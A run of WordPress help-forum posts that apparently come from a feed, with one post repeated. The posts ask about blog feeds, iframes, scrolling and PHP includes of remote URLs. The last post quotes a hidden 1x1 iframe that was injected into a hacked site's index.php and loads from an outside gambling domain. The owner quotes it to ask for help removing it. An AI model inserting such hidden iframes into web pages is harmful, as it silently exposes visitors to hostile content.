I have had a script that pulled my latest blog put it on my front page of my website for years. I have just had to redo all of it along with wordpress and now there seems to be 2 issues. 1st the feed to the index.php page of my website it works just wont bring in the image igf you click on more and the theme page opens same issue however when you click on the post to open it all works. So it is like loosing something in the process. 2nd I also want to feed the blog page to my website on aa page called blog.php I am currently using an Iframe is there a better way? lazermodels.com is the website.
Thank you
]]>If you have a very long site within the wrapper and a user clicks on a link that’s located near the bottom, the wrapper stays there at the bottom. This is a very annoying inconvenience.
anyway to get to the wrapper to jump back to top automatically after the page loads?
]]>If you have a very long site within the wrapper and a user clicks on a link that’s located near the bottom, the wrapper stays there at the bottom. This is a very annoying inconvenience.
anyway to get to the wrapper to jump back to top automatically after the page loads?
]]>I am trying an alternative for the Iframes, by trying to use php includes.
I have tried several plugins but cant seem to get it working.
To be more exact, I tried:
exec php
add post url
include me
and MaGiKS Proper PHP Include
I need to include several sites with an form on it, just like this one:
I have tried <?php include(“https://proef-abonnementen.nu.site-id.nl/servlet/___?action=href&cid=982&sid=4669&pid=3”); ?>
and some more, which at the moment I cannot find back. But I keep getting nothing or an error message.
I am not a wizzard with php, and never worked with the include tags before. Could someone help me out please?
]]>most recently, my site was attacked with:
<iframe src=”https://superbetfair.cn/in.cgi?income43″ width=1 height=1 style=”visibility: hidden”></iframe>
i removed it locally but it magically came back when i uploaded. the string is only on the index.php page
since removing the string from the footer, it has now found itself above the <head> tag.
any help, much appreciated.